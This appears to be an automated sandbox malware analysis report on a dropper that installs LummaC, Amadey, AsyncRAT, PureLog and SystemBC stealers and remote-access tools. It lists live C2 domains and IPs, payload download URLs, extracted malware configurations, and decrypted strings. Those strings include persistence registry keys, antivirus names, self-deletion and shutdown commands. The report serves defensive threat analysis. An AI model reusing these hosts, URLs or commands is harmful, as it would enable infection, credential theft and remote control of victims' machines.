Source: afccf6841f.exe, 0000002F.00000002.2455123932.0000000000FD2000.00000002.00000001.01000000.0000000C.sdmp	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]\|%%\|%[-+ 0#]?([0-9]\|\)?(\.[0-9]\|\.\)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: afccf6841f.exe	Binary or memory string: WIN_XPe
Source: afccf6841f.exe	Binary or memory string: WIN_VISTA
Source: afccf6841f.exe	Binary or memory string: WIN_7
Source: afccf6841f.exe	Binary or memory string: WIN_8

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: 63.2.c1336f9f75.exe.a040000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 63.2.c1336f9f75.exe.a040000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 63.3.c1336f9f75.exe.a040000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 63.3.c1336f9f75.exe.a040000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 63.3.c1336f9f75.exe.9ff0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 63.3.c1336f9f75.exe.9ff0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 63.2.c1336f9f75.exe.9ff0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 63.2.c1336f9f75.exe.9ff0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 76.2.1e8dfbd5c2.exe.3c99550.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000003F.00000003.2863781739.0000000009FF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003F.00000002.2927194723.000000000A040000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003F.00000002.2927763179.000000000A17E000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003F.00000002.2927194723.0000000009FF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003F.00000003.2863781739.000000000A040000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000004C.00000002.2782844886.0000000003C99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1075513001\9228e21255.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe, type: DROPPED
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Yara detected PureLog Stealer

Source: Yara match	File source: 76.2.1e8dfbd5c2.exe.3c99550.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 76.2.1e8dfbd5c2.exe.3c99550.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 76.0.1e8dfbd5c2.exe.990000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000004C.00000000.2507798493.0000000000992000.00000002.00000001.01000000.0000001A.sdmp, type: MEMORY
Source: Yara match	File source: 0000004C.00000002.2782844886.0000000003C99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1075512001\5d2afc26b8.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1075516001\L5shRfh.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\L5shRfh[1].exe, type: DROPPED

Yara detected SystemBC

Source: Yara match	File source: 7.2.k6Sly2p.exe.2a214e4.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 66.2.fbpbh.exe.33c0690.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 66.2.fbpbh.exe.33c0690.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.k6Sly2p.exe.2a214e4.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.2464434325.0000000002C53000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2464434325.0000000002911000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000042.00000002.2801612037.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000042.00000002.2801612037.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: k6Sly2p.exe PID: 5796, type: MEMORYSTR

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Code function: 8_2_00F91204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,		8_2_00F91204
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Code function: 8_2_00F91806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		8_2_00F91806

Screenshots

Behavior

Click here to start
Slideshow Behavior Animation

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
185.215.113.43	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
185.215.113.75	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	false
185.215.113.16	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true

Contacted Domains

Name	IP	Active
edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com	217.20.57.19	true
UrDtxPvdestkLUKCgdoC.UrDtxPvdestkLUKCgdoC	unknown	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
suggestyuoz.biz	true	Avira URL Cloud: malware	unknown
http://185.215.113.16/mine/random.exe	false		high
wodresomdaymomentum.org	false		high
pleasedcfrown.biz	true	Avira URL Cloud: malware	unknown
edcatiofireeu.shop	true	Avira URL Cloud: malware	unknown
http://185.215.113.43/Zu7JuNko/index.php	false		high
affordtempyo.biz	true	Avira URL Cloud: malware	unknown
impolitewearr.biz	true	Avira URL Cloud: malware	unknown
hoursuhouy.biz	true	Avira URL Cloud: malware	unknown
http://185.215.113.16/defend/random.exe	false		high
toppyneedus.biz	false		high
http://185.215.113.75/files/748049926/k6Sly2p.exe	false	Avira URL Cloud: safe	unknown
lightdeerysua.biz	true	Avira URL Cloud: malware	unknown
mixedrecipew.biz	true	Avira URL Cloud: malware	unknown

AV Detection

Antivirus / Scanner detection for submitted sample

Source: DhqvS8pXj8.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://185.215.113.43/Zu7JuNko/index.php001	Avira URL Cloud: Label: malware
Source: http://185.215.113.75/files/5765828710/ViGgA8C.exe	Avira URL Cloud: Label: malware
Source: http://185.215.113.75/files/ReverseSheller/random.exe	Avira URL Cloud: Label: malware
Source: pleasedcfrown.biz	Avira URL Cloud: Label: malware
Source: suggestyuoz.biz	Avira URL Cloud: Label: malware
Source: edcatiofireeu.shop	Avira URL Cloud: Label: malware
Source: impolitewearr.biz	Avira URL Cloud: Label: malware
Source: affordtempyo.biz	Avira URL Cloud: Label: malware
Source: hoursuhouy.biz	Avira URL Cloud: Label: malware
Source: http://185.215.113.75/files/c0dxnfz/random.exe	Avira URL Cloud: Label: malware
Source: http://185.215.113.75/files/6158422886/r7MRNUY.exe	Avira URL Cloud: Label: malware
Source: http://185.215.113.75/files/7244183739/L5shRfh.exe	Avira URL Cloud: Label: phishing
Source: http://185.215.113.75/files/asjduwgsgausi/random.exe	Avira URL Cloud: Label: malware
Source: http://185.215.113.75/files/none/random.exe	Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.phpER	Avira URL Cloud: Label: malware
Source: http://185.215.113.75/files/rast333a/random.exe	Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.php~	Avira URL Cloud: Label: malware
Source: lightdeerysua.biz	Avira URL Cloud: Label: malware
Source: http://185.215.113.75/files/5643377291/7fOMOTQ.exe	Avira URL Cloud: Label: malware
Source: mixedrecipew.biz	Avira URL Cloud: Label: malware
Source: http://185.215.113.75/files/fate/random.exe	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\1075513001\9228e21255.exe	Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1075514001\d895046020.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe	Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\7fOMOTQ[1].exe	Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Fe36XBk[1].exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen

Found malware configuration

Source: 0000003F.00000003.2863781739.0000000009FF0000.00000004.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: LummaC {"C2 url": ["pleasedcfrown.biz", "affordtempyo.biz", "mixedrecipew.biz", "hoursuhouy.biz", "suggestyuoz.biz", "lightdeerysua.biz", "toppyneedus.biz", "impolitewearr.biz", "edcatiofireeu.shop"], "Build id": "Jxy8Jp--new"}
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: 00000039.00000002.2988583690.000000000197A000.00000004.00000020.00020000.00000000.sdmp	Malware Configuration Extractor: AsyncRAT {"External_config_on_Pastebin": "null", "Server": "159.100.19.137", "Ports": "7707", "Version": "0.5.8", "Autorun": "false", "Install_Folder": "svchost.exe", "Install_File": "MTZ4cVRldGczWDFoSHVwbHNqYlc2ZE9GUXRheUlEdnY="}
Source: 66.2.fbpbh.exe.33c0690.0.unpack	Malware Configuration Extractor: SystemBC {"HOST1": "wodresomdaymomentum.org", "HOST2": "wodresomdaymomentum.org", "DNS1": "5.132.191.104", "DNS2": "ns1.vic.au.dns.opennic.glue", "DNS3": "ns2.vic.au.dns.opennic.glue"}

Multi AV Scanner detection for dropped file

Source: C:\ProgramData\jhbbvnx\fbpbh.exe	ReversingLabs: Detection: 31%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Fe36XBk[1].exe	ReversingLabs: Detection: 52%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\k6Sly2p[1].exe	ReversingLabs: Detection: 31%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	ReversingLabs: Detection: 65%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\7fOMOTQ[1].exe	ReversingLabs: Detection: 68%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe	ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe	ReversingLabs: Detection: 65%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[2].exe	ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\L5shRfh[1].exe	ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	ReversingLabs: Detection: 31%
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	ReversingLabs: Detection: 65%
Source: C:\Users\user\AppData\Local\Temp\1075510001\c1336f9f75.exe	ReversingLabs: Detection: 65%
Source: C:\Users\user\AppData\Local\Temp\1075512001\5d2afc26b8.exe	ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Temp\1075513001\9228e21255.exe	ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Temp\1075515001\k6Sly2p.exe	ReversingLabs: Detection: 31%
Source: C:\Users\user\AppData\Local\Temp\1075516001\L5shRfh.exe	ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Temp\1075517001\7fOMOTQ.exe	ReversingLabs: Detection: 68%
Source: C:\Users\user\AppData\Local\Temp\1075519001\Fe36XBk.exe	ReversingLabs: Detection: 52%
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	ReversingLabs: Detection: 59%

Multi AV Scanner detection for submitted file

Source: DhqvS8pXj8.exe	ReversingLabs: Detection: 59%
Source: DhqvS8pXj8.exe	Virustotal: Detection: 47%			Perma Link

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.7% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\1075513001\9228e21255.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1075514001\d895046020.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1075512001\5d2afc26b8.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\7fOMOTQ[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Fe36XBk[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE	Joe Sandbox ML: detected
Source: C:\ProgramData\jhbbvnx\fbpbh.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\k6Sly2p[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\L5shRfh[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: DhqvS8pXj8.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 0000003F.00000003.2863781739.0000000009FF0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: pleasedcfrown.biz
Source: 0000003F.00000003.2863781739.0000000009FF0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: affordtempyo.biz
Source: 0000003F.00000003.2863781739.0000000009FF0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: mixedrecipew.biz
Source: 0000003F.00000003.2863781739.0000000009FF0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: hoursuhouy.biz
Source: 0000003F.00000003.2863781739.0000000009FF0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: suggestyuoz.biz
Source: 0000003F.00000003.2863781739.0000000009FF0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: lightdeerysua.biz
Source: 0000003F.00000003.2863781739.0000000009FF0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: toppyneedus.biz
Source: 0000003F.00000003.2863781739.0000000009FF0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: impolitewearr.biz
Source: 0000003F.00000003.2863781739.0000000009FF0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: edcatiofireeu.shop
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: 185.215.113.43
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: /Zu7JuNko/index.php
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: S-%lu-
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: abc3bc1985
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: skotes.exe
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Startup
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: cmd /C RMDIR /s/q
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: rundll32
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Programs
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: %USERPROFILE%
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: cred.dll\|clip.dll\|
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: cred.dll
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: clip.dll
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: http://
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: https://
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: /quiet
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: /Plugins/
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: &unit=
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: shell32.dll
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: kernel32.dll
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: GetNativeSystemInfo
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: ProgramData\
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: AVAST Software
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Kaspersky Lab
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Panda Security
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Doctor Web
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: 360TotalSecurity
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Bitdefender
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Norton
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Sophos
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Comodo
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: WinDefender
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: 0123456789
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: ------
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: ?scr=1
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: ComputerName
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: abcdefghijklmnopqrstuvwxyz0123456789-_
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: -unicode-
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: SYSTEM\ControlSet001\Services\BasicDisplay\Video
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: VideoID
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: DefaultSettings.XResolution
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: DefaultSettings.YResolution
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: ProductName
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: CurrentBuild
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: rundll32.exe
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: "taskkill /f /im "
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: " && timeout 1 && del
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: && Exit"
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: " && ren
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Powershell.exe
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: -executionpolicy remotesigned -File "
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: shutdown -s -t 0
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: random
Source: 00000039.00000002.2988583690.000000000197A000.00000004.00000020.00020000.00000000.sdmp	String decryptor: 7707
Source: 00000039.00000002.2988583690.000000000197A000.00000004.00000020.00020000.00000000.sdmp	String decryptor: 159.100.19.137
Source: 00000039.00000002.2988583690.000000000197A000.00000004.00000020.00020000.00000000.sdmp	String decryptor: 0.5.8
Source: 00000039.00000002.2988583690.000000000197A000.00000004.00000020.00020000.00000000.sdmp	String decryptor: false
Source: 00000039.00000002.2988583690.000000000197A000.00000004.00000020.00020000.00000000.sdmp	String decryptor: yBu0GW2G5zAc
Source: 00000039.00000002.2988583690.000000000197A000.00000004.00000020.00020000.00000000.sdmp	String decryptor: MIIE7DCCAtSgAwIBAgIQAM+os8tD+NpTWChT8JYtyzANBgkqhkiG9w0BAQ0FADAXMRUwEwYDVQQDDAxUcnVzdCBTZXJ2ZXIwIBcNMjUwMTIwMDM1NjA0WhgPOTk5OTEyMzEyMzU5NTlaMBcxFTATBgNVBAMMDFRydXN0IFNlcnZlcjCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAJ5FzkhjuI8et+p8G29QDGsZ28VZ1PtKbMZx8FrxkUQoQBU7DXFh8mfgTQUhWgMqctpupDC+UhQxQkedPdHe9SvuAtpKEWUFOQzNQMTy3JEvHv3UZfM9Ib5ICGCQtcqInk73RbEh7QdFBK6wE57zENL9lXy8aEBeJk/elSNvLTJwbpa+lP20hlBuuyBWqvPd4/DinQJIRYSIEPDa3hcefGCbnoTp3dg9jttDM+MXtGEz4OurkP47+nFeHgQe7FkNCi5UHaiwvNs8JR7L1yR7HTPlvSwRtAkC0STJtczRA93If63bYMkaC+1QNHQR+WN3c9MCK6SLbGk4nMfSiG3ybohbKhNoJIcsdyFyOOn6N54eCaEwwNzDlb1qkor0bemYVuaT3ZRG27H6C9R9eqyoHQ4WTppSBIm+MBQ+gimD6XdEUCBcM0qAvrVFEy+mFn8FIhKAng9fgPnd47WWJGosTjsezqxJTVYYhUn2dm/VU3O0sdfzJ8O9dIO4htYIs+X5PMuBP2HyLGDsa+VpEkayYMYGmiHD6wDrO20+Z5BdbGUikNdfKo4goEu3A/HIa7YuzFN70ma9Qb+7P448L3mu8pLbll+0iUNo2rYrJ+7nMjduOTeKdBPPYNBHj57Zdd1MkQaIBhHNQ04qdBZYUhJclvbLlx1nPLSMQI9XL0NoRDXvAgMBAAGjMjAwMB0GA1UdDgQWBBSnnBI6rWXybai+OiRUoM3TzO1xlTAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4ICAQCLFgYyTM5EWEcXb2nZYzeqhuu/lhz0AuSDBoXDWQYuV1CgsKoab0s2yZ1v0jRw77uM1As